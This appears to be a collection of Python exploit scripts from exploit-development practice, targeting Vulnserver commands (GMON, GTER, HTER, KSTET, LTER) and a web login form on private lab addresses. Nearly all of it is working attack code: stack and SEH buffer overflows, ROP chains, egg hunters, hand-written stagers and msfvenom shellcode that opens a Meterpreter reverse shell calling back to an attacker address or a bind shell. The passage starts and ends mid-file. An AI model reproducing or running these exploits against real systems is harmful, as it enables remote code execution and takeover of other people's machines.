126 | rev_met_7887 += "\x90\xfa\x8e\xa5\x34\x70\x22\xb1\x44\xdb\x2a"
127 | rev_met_7887 += "\x76\x65\xe4\xaa\x10\xfe\x97\x98\xbf\x54\x30"
128 | rev_met_7887 += "\x90\x48\x73\xc7\xa1\x5f\x84\x17\x09\x0f\x7a"
129 | rev_met_7887 += "\x98\x69\x19\xb9\xcc\x39\x31\x68\x6d\xd2\xc1"
130 | rev_met_7887 += "\x95\xb8\x4e\xc8\x01\xef\x9e\x0c\x3b\x87\x9c"
131 | rev_met_7887 += "\x8c\xa2\x97\x29\x6a\x8a\x77\x79\x23\x6b\x28"
132 | rev_met_7887 += "\x39\x93\x03\x22\xb6\xcc\x34\x4d\x1d\x65\xde"
133 | rev_met_7887 += "\xa2\xcb\xdd\x77\x5a\x56\x95\xe6\xa3\x4d\xd3"
134 | rev_met_7887 += "\x29\x2f\x67\x23\xe7\xd8\x02\x37\x10\xbf\xec"
135 | rev_met_7887 += "\xc7\xe1\x2a\xec\xad\xe5\xfc\xbb\x59\xe4\xd9"
136 | rev_met_7887 += "\x8b\xc5\x17\x0c\x88\x02\xe7\xd1\xb8\x79\xde"
137 | rev_met_7887 += "\x47\x84\x15\x1f\x88\x04\xe6\x49\xc2\x04\x8e"
138 | rev_met_7887 += "\x2d\xb6\x57\xab\x31\x63\xc4\x60\xa4\x8c\xbc"
139 | rev_met_7887 += "\xd5\x6f\xe5\x42\x03\x47\xaa\xbd\x66\xdb\xad"
140 | rev_met_7887 += "\x41\xf4\xf4\x15\x29\x06\x45\xa6\xa9\x6c\x45"
141 | rev_met_7887 += "\xf6\xc1\x7b\x6a\xf9\x21\x83\xa1\x52\x29\x0e"
142 | rev_met_7887 += "\x24\x10\xc8\x0f\x6d\xf4\x54\x0f\x82\x2d\x67"
143 | rev_met_7887 += "\x6a\xeb\xd2\x88\x8b\xe5\xb6\x89\x8b\x09\xc9"
144 | rev_met_7887 += "\xb6\x5d\x30\xbf\xf9\x5d\x07\xb0\x4c\xc3\x2e"
145 | rev_met_7887 += "\x5b\xae\x57\x30\x4e"
146 | 
147 | # BAD CHAR'S '\x00\x25\x26\x27\x2b'
148 | payload  = "A" * split
149 | payload += create_rop_chain()
150 | payload += "\x90" * 20
151 | payload += rev_met_7887	
152 | payload += "B" * (seh_offset - len(payload))
153 | payload += "DEAD"
154 | payload += pack("<L", 0x1002280a)
155 | payload += "A" * (eax_offset - len(payload))
156 | payload += "DDDD"
157 | payload += "A" * (max_size - len(payload))
158 | 
159 | request  = "GET / HTTP/1.1\r\n"
160 | request += "Host: 172.16.192.177\r\n"
161 | request += "Mozilla/5.0 (X11 Linux x86_64 rv:60.0 Gecko/20100101 Firefox/60.0\r\n"
162 | request += "Accept: text/html,application/xhtml+xml,application/xmlq=0.9,*/*q=0.8\r\n"
163 | request += "Accept-Language: enq=0.5\r\n"
164 | request += "Accept-Encoding: gzip, deflate\r\n"
165 | request += "Referer: http://172.16.192.167/\r\n"
166 | request += "Content-type: application/x-www-form-urlencoded\r\n"
167 | request += "Content-Length: 64\r\n"
168 | request += "Cookie: SESSIONID=20557 UserID=admin PassWD=admin frmUserName= frmUserPass= rememberPass=202%2C197%2C208%2C215%2C201\r\n"
169 | request += "Connection: close\r\n"
170 | request += "\r\n"
171 | request += "\r\n"
172 | request += "frmLogin=true&frmUserName=" + payload +"&frmUserPass=admin&login=Login%21"
173 | 
174 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
175 | s.connect((host, port))
176 | s.send(request)
177 | 


--------------------------------------------------------------------------------
/egg_fuzzysecurity_4.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 |  
 3 | import socket
 4 | import os
 5 | import sys
 6 | from struct import pack
 7 | 
 8 | # junk = "A" * 515
 9 | eip = pack("<L", 0x77f31d2f) 
10 | egg_hunter = (
11 | "\x66\x81\xca\xff"
12 | "\x0f\x42\x52\x6a"
13 | "\x02\x58\xcd\x2e"
14 | "\x3c\x05\x5a\x74"
15 | "\xef\xb8\x77\x30"
16 | "\x30\x74\x8b\xfa"
17 | "\xaf\x75\xea\xaf"
18 | "\x75\xe7\xff\xe7")
19 | junk = "A" * 478
20 | 
21 | stage1 = junk + egg_hunter + "A"*5 + eip + "\xEB\xC4"
22 | 
23 | shellcode = (
24 | "\x89\xe5\xdb\xda\xd9\x75\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
25 | "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
26 | "\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
27 | "\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
28 | "\x69\x6c\x6d\x38\x6e\x62\x65\x50\x77\x70\x45\x50\x73\x50\x6e"
29 | "\x69\x38\x65\x34\x71\x6b\x70\x61\x74\x4e\x6b\x62\x70\x64\x70"
30 | "\x4c\x4b\x30\x52\x36\x6c\x6c\x4b\x50\x52\x54\x54\x4c\x4b\x52"
31 | "\x52\x31\x38\x66\x6f\x78\x37\x63\x7a\x57\x56\x64\x71\x39\x6f"
32 | "\x4c\x6c\x77\x4c\x61\x71\x31\x6c\x65\x52\x66\x4c\x75\x70\x69"
33 | "\x51\x38\x4f\x56\x6d\x77\x71\x39\x57\x39\x72\x7a\x52\x70\x52"
34 | "\x76\x37\x4e\x6b\x71\x42\x52\x30\x6e\x6b\x32\x6a\x75\x6c\x6e"
35 | "\x6b\x30\x4c\x76\x71\x42\x58\x38\x63\x51\x58\x77\x71\x58\x51"
36 | "\x52\x71\x6e\x6b\x66\x39\x75\x70\x65\x51\x49\x43\x4e\x6b\x71"
37 | "\x59\x65\x48\x4b\x53\x34\x7a\x52\x69\x6e\x6b\x55\x64\x6c\x4b"
38 | "\x77\x71\x79\x46\x50\x31\x79\x6f\x6e\x4c\x39\x51\x58\x4f\x66"
39 | "\x6d\x56\x61\x4f\x37\x55\x68\x6d\x30\x73\x45\x39\x66\x63\x33"
40 | "\x51\x6d\x58\x78\x47\x4b\x63\x4d\x77\x54\x53\x45\x48\x64\x63"
41 | "\x68\x6e\x6b\x61\x48\x31\x34\x56\x61\x4b\x63\x63\x56\x6c\x4b"
42 | "\x54\x4c\x30\x4b\x6c\x4b\x63\x68\x47\x6c\x73\x31\x78\x53\x4c"
43 | "\x4b\x37\x74\x6c\x4b\x77\x71\x68\x50\x6f\x79\x57\x34\x36\x44"
44 | "\x67\x54\x51\x4b\x31\x4b\x35\x31\x73\x69\x31\x4a\x33\x61\x79"
45 | "\x6f\x4b\x50\x63\x6f\x33\x6f\x63\x6a\x4c\x4b\x45\x42\x58\x6b"
46 | "\x6e\x6d\x63\x6d\x31\x7a\x76\x61\x4e\x6d\x6b\x35\x78\x32\x37"
47 | "\x70\x43\x30\x63\x30\x46\x30\x73\x58\x56\x51\x4e\x6b\x62\x4f"
48 | "\x4f\x77\x4b\x4f\x69\x45\x6f\x4b\x4c\x30\x78\x35\x6f\x52\x46"
49 | "\x36\x63\x58\x4d\x76\x4e\x75\x4f\x4d\x4d\x4d\x4b\x4f\x59\x45"
50 | "\x57\x4c\x74\x46\x31\x6c\x67\x7a\x6d\x50\x59\x6b\x79\x70\x52"
51 | "\x55\x75\x55\x4d\x6b\x67\x37\x64\x53\x73\x42\x32\x4f\x61\x7a"
52 | "\x67\x70\x33\x63\x39\x6f\x6e\x35\x73\x53\x33\x51\x52\x4c\x31"
53 | "\x73\x74\x6e\x33\x55\x73\x48\x42\x45\x55\x50\x41\x41")
54 | 
55 | stage2 = "w00tw00t" + shellcode
56 | 
57 | buffer = (
58 | "HEAD /" + stage1 + " HTTP/1.1\r\n"
59 | "Host: 172.16.192.163:8080\r\n"
60 | "User-Agent: " + stage2 + "\r\n"
61 | "Keep-Alive: 115\r\n"
62 | "Connection: keep-alive\r\n\r\n")
63 |  
64 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
65 | expl.connect(("172.16.192.163", 8080))
66 | expl.send(buffer)
67 | expl.close()


--------------------------------------------------------------------------------
/gmon_vulnserver.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | import socket
 3 | from struct import pack
 4 | 
 5 | host = '172.16.192.168'
 6 | port = 9999
 7 | max_size = 5000
 8 | 
 9 | egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e"
10 | 			"\x3c\x05\x5a\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa"
11 | 			"\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
12 | 
13 | # msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.192.192 LPORT=7887 
14 | # -b "\x00\x0a\x0d" -a x86 --platform windows -f python -v rev_met_7887
15 | 
16 | rev_met_7887 =  "w00tw00t"
17 | rev_met_7887 += "\xd9\xf6\xba\x48\xa2\xf9\xa4\xd9\x74\x24\xf4"
18 | rev_met_7887 += "\x5d\x33\xc9\xb1\x56\x31\x55\x18\x83\xc5\x04"
19 | rev_met_7887 += "\x03\x55\x5c\x40\x0c\x58\xb4\x06\xef\xa1\x44"
20 | rev_met_7887 += "\x67\x79\x44\x75\xa7\x1d\x0c\x25\x17\x55\x40"
21 | rev_met_7887 += "\xc9\xdc\x3b\x71\x5a\x90\x93\x76\xeb\x1f\xc2"
22 | rev_met_7887 += "\xb9\xec\x0c\x36\xdb\x6e\x4f\x6b\x3b\x4f\x80"
23 | rev_met_7887 += "\x7e\x3a\x88\xfd\x73\x6e\x41\x89\x26\x9f\xe6"
24 | rev_met_7887 += "\xc7\xfa\x14\xb4\xc6\x7a\xc8\x0c\xe8\xab\x5f"
25 | rev_met_7887 += "\x07\xb3\x6b\x61\xc4\xcf\x25\x79\x09\xf5\xfc"
26 | rev_met_7887 += "\xf2\xf9\x81\xfe\xd2\x30\x69\xac\x1a\xfd\x98"
27 | rev_met_7887 += "\xac\x5b\x39\x43\xdb\x95\x3a\xfe\xdc\x61\x41"
28 | rev_met_7887 += "\x24\x68\x72\xe1\xaf\xca\x5e\x10\x63\x8c\x15"
29 | rev_met_7887 += "\x1e\xc8\xda\x72\x02\xcf\x0f\x09\x3e\x44\xae"
30 | rev_met_7887 += "\xde\xb7\x1e\x95\xfa\x9c\xc5\xb4\x5b\x78\xab"
31 | rev_met_7887 += "\xc9\xbc\x23\x14\x6c\xb6\xc9\x41\x1d\x95\x85"
32 | rev_met_7887 += "\xa6\x2c\x26\x55\xa1\x27\x55\x67\x6e\x9c\xf1"
33 | rev_met_7887 += "\xcb\xe7\x3a\x05\x5a\xef\xbc\xd9\xe4\x60\x43"
34 | rev_met_7887 += "\xda\x14\xa8\x80\x8e\x44\xc2\x21\xaf\x0f\x12"
35 | rev_met_7887 += "\xcd\x7a\xa5\x18\x59\x29\x29\xdd\x59\x59\x4b"
36 | rev_met_7887 += "\xdd\x47\x55\xc2\x3b\x27\x39\x84\x93\x88\xe9"
37 | rev_met_7887 += "\x64\x44\x61\xe0\x6b\xbb\x91\x0b\xa6\xd4\x38"
38 | rev_met_7887 += "\xe4\x1e\x8c\xd4\x9d\x3b\x46\x44\x61\x96\x22"
39 | rev_met_7887 += "\x46\xe9\x12\xd2\x09\x1a\x57\xc0\x7e\x7d\x97"
40 | rev_met_7887 += "\x18\x7f\xe8\x97\x72\x7b\xba\xc0\xea\x81\x9b"
41 | rev_met_7887 += "\x26\xb5\x7a\xce\x35\xb2\x85\x8f\x0f\xc8\xb0"
42 | rev_met_7887 += "\x05\x2f\xa6\xbc\xc9\xaf\x36\xeb\x83\xaf\x5e"
43 | rev_met_7887 += "\x4b\xf0\xfc\x7b\x94\x2d\x91\xd7\x01\xce\xc3"
44 | rev_met_7887 += "\x84\x82\xa6\xe9\xf3\xe5\x68\x12\xd6\x75\x6e"
45 | rev_met_7887 += "\xec\xa4\x51\xd7\x84\x56\xe2\xe7\x54\x3d\xe2"
46 | rev_met_7887 += "\xb7\x3c\xca\xcd\x38\x8c\x33\xc4\x10\x84\xbe"
47 | rev_met_7887 += "\x89\xd3\x35\xbe\x83\xb2\xeb\xbf\x20\x6f\x1c"
48 | rev_met_7887 += "\xc5\x49\x90\xdd\x3a\x40\xf5\xde\x3a\x6c\x0b"
49 | rev_met_7887 += "\xe3\xec\x55\x79\x22\x2d\xe2\x72\x11\x10\x43"
50 | rev_met_7887 += "\x19\x59\x06\x93\x08"
51 | 
52 | payload = "\x90" * 50
53 | payload += rev_met_7887
54 | payload += "A" * (3369 - len(rev_met_7887) - 50) 
55 | payload += egghunter
56 | payload += "B" * (126 - len(egghunter))
57 | payload += "\xEB\x80\x90\x90"
58 | payload += pack("<L",0x625010b4)
59 | payload += "D" * (max_size - len(payload))
60 | 
61 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
62 | s.connect((host, port))
63 | print s.recv(1024)
64 | print "[*] Sending payload of size: {0} chars...".format(len(payload))
65 | s.send("GMON /.:/" + payload + "\r\n")
66 | s.close()
67 | 


--------------------------------------------------------------------------------
/gter_vulnserver.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | # -*- coding: utf-8 -*-
 3 | 
 4 | import socket
 5 | from struct import pack
 6 | import time
 7 | 
 8 | host = '172.16.192.168'
 9 | port = 9999
10 | 
11 | rev_met_7887 =  ""
12 | rev_met_7887 += "\xdb\xc2\xbb\x35\x0e\x19\x40\xd9\x74\x24\xf4"
13 | rev_met_7887 += "\x58\x29\xc9\xb1\x56\x31\x58\x18\x03\x58\x18"
14 | rev_met_7887 += "\x83\xe8\xc9\xec\xec\xbc\xd9\x73\x0e\x3d\x19"
15 | rev_met_7887 += "\x14\x86\xd8\x28\x14\xfc\xa9\x1a\xa4\x76\xff"
16 | rev_met_7887 += "\x96\x4f\xda\x14\x2d\x3d\xf3\x1b\x86\x88\x25"
17 | rev_met_7887 += "\x15\x17\xa0\x16\x34\x9b\xbb\x4a\x96\xa2\x73"
18 | rev_met_7887 += "\x9f\xd7\xe3\x6e\x52\x85\xbc\xe5\xc1\x3a\xc9"
19 | rev_met_7887 += "\xb0\xd9\xb1\x81\x55\x5a\x25\x51\x57\x4b\xf8"
20 | rev_met_7887 += "\xea\x0e\x4b\xfa\x3f\x3b\xc2\xe4\x5c\x06\x9c"
21 | rev_met_7887 += "\x9f\x96\xfc\x1f\x76\xe7\xfd\x8c\xb7\xc8\x0f"
22 | rev_met_7887 += "\xcc\xf0\xee\xef\xbb\x08\x0d\x8d\xbb\xce\x6c"
23 | rev_met_7887 += "\x49\x49\xd5\xd6\x1a\xe9\x31\xe7\xcf\x6c\xb1"
24 | rev_met_7887 += "\xeb\xa4\xfb\x9d\xef\x3b\x2f\x96\x0b\xb7\xce"
25 | rev_met_7887 += "\x79\x9a\x83\xf4\x5d\xc7\x50\x94\xc4\xad\x37"
26 | rev_met_7887 += "\xa9\x17\x0e\xe7\x0f\x53\xa2\xfc\x3d\x3e\xaa"
27 | rev_met_7887 += "\x31\x0c\xc1\x2a\x5e\x07\xb2\x18\xc1\xb3\x5c"
28 | rev_met_7887 += "\x10\x8a\x1d\x9a\x21\x9c\x9d\x74\x89\xcd\x63"
29 | rev_met_7887 += "\x75\xe9\xc4\xa7\x21\xb9\x7e\x01\x4a\x52\x7f"
30 | rev_met_7887 += "\xae\x9f\xce\x75\x38\x8c\x1e\x4a\x11\xa4\x1c"
31 | rev_met_7887 += "\x4a\x7c\xfa\xa9\xac\xd0\x54\xf9\x60\x91\x04"
32 | rev_met_7887 += "\xb9\xd0\x79\x4f\x36\x0e\x99\x70\x9d\x27\x30"
33 | rev_met_7887 += "\x9f\x4b\x1f\xad\x06\xd6\xeb\x4c\xc6\xcd\x91"
34 | rev_met_7887 += "\x4f\x4c\xe7\x66\x01\xa5\x82\x74\x76\xd2\x6c"
35 | rev_met_7887 += "\x85\x87\x77\x6c\xef\x83\xd1\x3b\x87\x89\x04"
36 | rev_met_7887 += "\x0b\x08\x71\x63\x08\x4f\x8d\xf2\x38\x3b\xb8"
37 | rev_met_7887 += "\x60\x04\x53\xc5\x64\x84\xa3\x93\xee\x84\xcb"
38 | rev_met_7887 += "\x43\x4b\xd7\xee\x8b\x46\x44\xa3\x19\x69\x3c"
39 | rev_met_7887 += "\x17\x89\x01\xc2\x4e\xfd\x8d\x3d\xa5\x7d\xc9"
40 | rev_met_7887 += "\xc1\x3b\xaa\x72\xa9\xc3\xea\x82\x29\xae\xea"
41 | rev_met_7887 += "\xd2\x41\x25\xc4\xdd\xa1\xc6\xcf\xb5\xa9\x4d"
42 | rev_met_7887 += "\x9e\x74\x48\x51\x8b\xd9\xd4\x52\x38\xc2\xe7"
43 | rev_met_7887 += "\x29\x31\xf5\x08\xce\x5b\x92\x09\xce\x63\xa4"
44 | rev_met_7887 += "\x36\x18\x5a\xd2\x79\x98\xd9\xed\xcc\xbd\x48"
45 | rev_met_7887 += "\x64\x2e\x91\x8b\xad"
46 | 
47 | jmp_esp = pack("<L",0x62501205)
48 | jmp_to_start  = "\x54\x5A"
49 | jmp_to_start += "\x80\xEE\x01"
50 | jmp_to_start += "\x80\xC2\x69"
51 | jmp_to_start += "\xFF\xE2"
52 | 
53 | stage_two  = "\x54"  				# PUSH ESP
54 | stage_two += "\x58"  				# POP EAX
55 | stage_two += "\x80\xC4\x01" 		# ADD AH,1
56 | stage_two += "\x04\x88" 			# ADD AL,88
57 | stage_two += "\x83\xEC\x70" 		# SUB ESP,70
58 | stage_two += "\x83\xEC\x30"			# SUB ESP,30
59 | stage_two += "\x33\xDB" 			# XOR EBX,EBX
60 | stage_two += "\x53"  				# PUSH EBX
61 | stage_two += "\xB7\x02"  			# MOV BH,2
62 | stage_two += "\x53" 				# PUSH EBX
63 | stage_two += "\x54" 			 	# PUSH ESP
64 | stage_two += "\x5B" 				# POP EBX
65 | stage_two += "\x83\xC3\x70"			# ADD EBX,70
66 | stage_two += "\x53"			 		# PUSH EBX
67 | stage_two += "\xFF\x30" 			# PUSH DWORD PTR [ECX]
68 | stage_two += "\xBB\x44\x2C\x25\x40" # MOV EBX,40252C44
69 | stage_two += "\xC1\xEB\x08" 		# SHR EBX,8
70 | stage_two += "\xFF\xD3"				# CALL EBX
71 | 
72 | payload  = stage_two 
73 | payload += "A" * (147 - len(stage_two))
74 | payload += jmp_esp
75 | payload += jmp_to_start
76 | payload += "\x90" * (512 - len(rev_met_7887))
77 | 
78 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
79 | s.connect((host, port))
80 | print s.recv(1024)
81 | print "[*] Sending payload of size: {0} chars...".format(len(payload))
82 | s.send("GTER /.:/" + payload + "\r\n")
83 | time.sleep(2)
84 | s.send(rev_met_7887)
85 | s.send("\x90" * 512)
86 | s.close()
87 | 
88 | # 0040252C=<JMP.&WS2_32.recv>
89 | #
90 | # socket descript is offset ESP 188 at time of 2nd stage value 80
91 | # 


--------------------------------------------------------------------------------
/hter_vulnserver.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | # -*- coding: utf-8 -*-
 3 | 
 4 | import socket
 5 | from struct import pack
 6 | import time
 7 | 
 8 | host = '172.16.192.168'
 9 | port = 9999
10 | 
11 | # msfvenom -p windows/shell_bind_tcp EXITFUNC=thread -b "\x00" -f hex
12 | shellcode = ("d9ecb81cf65c70d97424f45e33c9b15331461703461783daf2be851e"
13 | 			 "12bc66dee3a1ef3bd2e1944845d2df1c6a99b2b4f9ef1abb4a457df2"
14 | 			 "4bf6bd95cf059275f1c5e774363b0524ef37b8d884020153d6830180"
15 | 			 "afa22017bbfce2966875ab806db0653b454e74ed97afdbd017422515"
16 | 			 "9fbd506fe34063b4999ee62e3954508abbb90759b7764305d489803e"
17 | 			 "e002279060500c3428022d6d94e5526d7759f7e69a8e8aa5f263a755"
18 | 			 "03ecb02631b36aa0793cb5377d1701a7809872ee46cc22986f6da958"
19 | 			 "8fb8445036137b9d88c33b0d610eb47291311e1b3acca132e759475e"
20 | 			 "070cdff6e56be861155e40055e88572a5f9effbcd4cd3bddeadb6b8a"
21 | 			 "7d91fdf91ca6d769bc35bc69cb256b3e9c9862aa3082dcc8c8522648"
22 | 			 "17a7a951da938d41221b8a35fa4a44e3bc24265d179ae009eed0324f"
23 | 			 "ef3cc5af5ee990d06f7d15a98d1dda60163d39a063d6e421cebb169c"
24 | 			 "0dc29414ee31845deb7e028e81efe7b0360f22"
25 | 
26 | payload = "A" * (2041)
27 | payload += "AF115062"	
28 | payload += "90" * 20
29 | payload += shellcode
30 | payload += "A" * (3000 - len(payload))
31 | 
32 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
33 | s.connect((host, port))
34 | print s.recv(1024)
35 | print "[*] Sending payload of size: {0} chars...".format(len(payload))
36 | 
37 | s.send("HTER " + payload )
38 | 
39 | s.close()
40 | 


--------------------------------------------------------------------------------
/kstet_vulnserver.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | # -*- coding: utf-8 -*-
 3 | 
 4 | import socket
 5 | from struct import pack
 6 | import time
 7 | 
 8 | host = '172.16.192.168'
 9 | port = 9999
10 | 
11 | exploit = ("" 
12 | "\x54"  				#  PUSH ESP
13 | "\x59"  				#  POP ECX
14 | "\x66\x81\xC1\x88\x01"  #  ADD CX,188
15 | "\x83\xEC\x50"  		#  SUB ESP,50 
16 | "\x33\xD2"  			#  XOR EDX,EDX
17 | "\x52"  				#  PUSH EDX
18 | "\x80\xC6\x02"		  	#  ADD DH,2
19 | "\x52"					#  PUSH EDX
20 | "\x54"  				#  PUSH ESP
21 | "\x5B"  				#  POP EBX
22 | "\x83\xC3\x50"  		#  ADD EBX,50
23 | "\x53"  				#  PUSH EBX
24 | "\xFF\x31"  			#  PUSH DWORD PTR DS:[ECX]
25 | "\xBB\x44\x2C\x25\x40"  #  MOV EBX,40252C44
26 | "\xC1\xEB\x08"  		#  SHR EBX,8
27 | "\xFF\xD3"  			#  CALL EBX
28 | )		  
29 | 
30 | shellcode =  ""
31 | shellcode += "\xdb\xc2\xbb\x35\x0e\x19\x40\xd9\x74\x24\xf4"
32 | shellcode += "\x58\x29\xc9\xb1\x56\x31\x58\x18\x03\x58\x18"
33 | shellcode += "\x83\xe8\xc9\xec\xec\xbc\xd9\x73\x0e\x3d\x19"
34 | shellcode += "\x14\x86\xd8\x28\x14\xfc\xa9\x1a\xa4\x76\xff"
35 | shellcode += "\x96\x4f\xda\x14\x2d\x3d\xf3\x1b\x86\x88\x25"
36 | shellcode += "\x15\x17\xa0\x16\x34\x9b\xbb\x4a\x96\xa2\x73"
37 | shellcode += "\x9f\xd7\xe3\x6e\x52\x85\xbc\xe5\xc1\x3a\xc9"
38 | shellcode += "\xb0\xd9\xb1\x81\x55\x5a\x25\x51\x57\x4b\xf8"
39 | shellcode += "\xea\x0e\x4b\xfa\x3f\x3b\xc2\xe4\x5c\x06\x9c"
40 | shellcode += "\x9f\x96\xfc\x1f\x76\xe7\xfd\x8c\xb7\xc8\x0f"
41 | shellcode += "\xcc\xf0\xee\xef\xbb\x08\x0d\x8d\xbb\xce\x6c"
42 | shellcode += "\x49\x49\xd5\xd6\x1a\xe9\x31\xe7\xcf\x6c\xb1"
43 | shellcode += "\xeb\xa4\xfb\x9d\xef\x3b\x2f\x96\x0b\xb7\xce"
44 | shellcode += "\x79\x9a\x83\xf4\x5d\xc7\x50\x94\xc4\xad\x37"
45 | shellcode += "\xa9\x17\x0e\xe7\x0f\x53\xa2\xfc\x3d\x3e\xaa"
46 | shellcode += "\x31\x0c\xc1\x2a\x5e\x07\xb2\x18\xc1\xb3\x5c"
47 | shellcode += "\x10\x8a\x1d\x9a\x21\x9c\x9d\x74\x89\xcd\x63"
48 | shellcode += "\x75\xe9\xc4\xa7\x21\xb9\x7e\x01\x4a\x52\x7f"
49 | shellcode += "\xae\x9f\xce\x75\x38\x8c\x1e\x4a\x11\xa4\x1c"
50 | shellcode += "\x4a\x7c\xfa\xa9\xac\xd0\x54\xf9\x60\x91\x04"
51 | shellcode += "\xb9\xd0\x79\x4f\x36\x0e\x99\x70\x9d\x27\x30"
52 | shellcode += "\x9f\x4b\x1f\xad\x06\xd6\xeb\x4c\xc6\xcd\x91"
53 | shellcode += "\x4f\x4c\xe7\x66\x01\xa5\x82\x74\x76\xd2\x6c"
54 | shellcode += "\x85\x87\x77\x6c\xef\x83\xd1\x3b\x87\x89\x04"
55 | shellcode += "\x0b\x08\x71\x63\x08\x4f\x8d\xf2\x38\x3b\xb8"
56 | shellcode += "\x60\x04\x53\xc5\x64\x84\xa3\x93\xee\x84\xcb"
57 | shellcode += "\x43\x4b\xd7\xee\x8b\x46\x44\xa3\x19\x69\x3c"
58 | shellcode += "\x17\x89\x01\xc2\x4e\xfd\x8d\x3d\xa5\x7d\xc9"
59 | shellcode += "\xc1\x3b\xaa\x72\xa9\xc3\xea\x82\x29\xae\xea"
60 | shellcode += "\xd2\x41\x25\xc4\xdd\xa1\xc6\xcf\xb5\xa9\x4d"
61 | shellcode += "\x9e\x74\x48\x51\x8b\xd9\xd4\x52\x38\xc2\xe7"
62 | shellcode += "\x29\x31\xf5\x08\xce\x5b\x92\x09\xce\x63\xa4"
63 | shellcode += "\x36\x18\x5a\xd2\x79\x98\xd9\xed\xcc\xbd\x48"
64 | shellcode += "\x64\x2e\x91\x8b\xad"
65 | 
66 | payload = exploit
67 | payload += "A" * (66 - len(payload)) 
68 | payload += pack("<L",0x62501205)		
69 | payload += "\xEB\xB8"					
70 | payload += "\x90" * 18
71 | payload += "\xCC" * 512 
72 | 
73 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
74 | s.connect((host, port))
75 | print s.recv(1024)
76 | print "[*] Sending payload of size: {0} chars...".format(len(payload))
77 | s.send("KSTET /.:/" + payload + "\r\n")
78 | time.sleep(2)
79 | s.send(shellcode + "\xCC" * (512 - len(shellcode)))
80 | s.close()
81 | 


--------------------------------------------------------------------------------
/lter_vulnserver.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | # -*- coding: utf-8 -*-
 3 | 
 4 | import socket
 5 | from struct import pack
 6 | import time
 7 | 
 8 | host = '172.16.192.168'
 9 | port = 9999
10 | 
11 | # msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.192.192 LPORT=7887 
12 | # -b "\x00\x0a\x0d" -a x86 --platform windows -f python -v shellcode
13 | 
14 | shellcode =  ""
15 | shellcode += "\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49"
16 | shellcode += "\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a"
17 | shellcode += "\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51"
18 | shellcode += "\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
19 | shellcode += "\x58\x50\x38\x41\x42\x75\x4a\x49\x39\x6c\x6d"
20 | shellcode += "\x38\x6f\x72\x35\x50\x57\x70\x57\x70\x31\x70"
21 | shellcode += "\x4b\x39\x4b\x55\x45\x61\x59\x50\x72\x44\x4c"
22 | shellcode += "\x4b\x56\x30\x76\x50\x6e\x6b\x36\x32\x34\x4c"
23 | shellcode += "\x4e\x6b\x76\x32\x34\x54\x4c\x4b\x64\x32\x44"
24 | shellcode += "\x68\x76\x6f\x48\x37\x62\x6a\x56\x46\x30\x31"
25 | shellcode += "\x69\x6f\x6c\x6c\x35\x6c\x53\x51\x31\x6c\x44"
26 | shellcode += "\x42\x46\x4c\x67\x50\x79\x51\x68\x4f\x44\x4d"
27 | shellcode += "\x36\x61\x4a\x67\x48\x62\x78\x72\x50\x52\x71"
28 | shellcode += "\x47\x6c\x4b\x62\x72\x72\x30\x6c\x4b\x30\x4a"
29 | shellcode += "\x57\x4c\x6c\x4b\x62\x6c\x32\x31\x31\x68\x78"
30 | shellcode += "\x63\x30\x48\x43\x31\x78\x51\x43\x61\x4c\x4b"
31 | shellcode += "\x56\x39\x75\x70\x45\x51\x78\x53\x6e\x6b\x61"
32 | shellcode += "\x59\x54\x58\x6d\x33\x76\x5a\x53\x79\x4e\x6b"
33 | shellcode += "\x74\x74\x6e\x6b\x43\x31\x7a\x76\x45\x61\x4b"
34 | shellcode += "\x4f\x4c\x6c\x4b\x71\x78\x4f\x66\x6d\x55\x51"
35 | shellcode += "\x69\x57\x35\x68\x4d\x30\x73\x45\x4c\x36\x56"
36 | shellcode += "\x63\x43\x4d\x78\x78\x77\x4b\x31\x6d\x54\x64"
37 | shellcode += "\x54\x35\x38\x64\x31\x48\x4e\x6b\x36\x38\x46"
38 | shellcode += "\x44\x43\x31\x6b\x63\x71\x76\x6e\x6b\x66\x6c"
39 | shellcode += "\x32\x6b\x6e\x6b\x62\x78\x75\x4c\x75\x51\x4b"
40 | shellcode += "\x63\x6c\x4b\x34\x44\x4e\x6b\x33\x31\x4a\x70"
41 | shellcode += "\x6e\x69\x73\x74\x65\x74\x54\x64\x33\x6b\x31"
42 | shellcode += "\x4b\x70\x61\x70\x59\x72\x7a\x46\x31\x59\x6f"
43 | shellcode += "\x4b\x50\x53\x6f\x31\x4f\x71\x4a\x4c\x4b\x54"
44 | shellcode += "\x52\x68\x6b\x6e\x6d\x53\x6d\x35\x38\x56\x53"
45 | shellcode += "\x70\x32\x67\x70\x43\x30\x32\x48\x72\x57\x63"
46 | shellcode += "\x43\x64\x72\x33\x6f\x73\x64\x53\x58\x62\x6c"
47 | shellcode += "\x72\x57\x35\x76\x63\x37\x4e\x69\x69\x78\x69"
48 | shellcode += "\x6f\x6a\x70\x48\x38\x7a\x30\x67\x71\x73\x30"
49 | shellcode += "\x47\x70\x34\x69\x38\x44\x50\x54\x66\x30\x32"
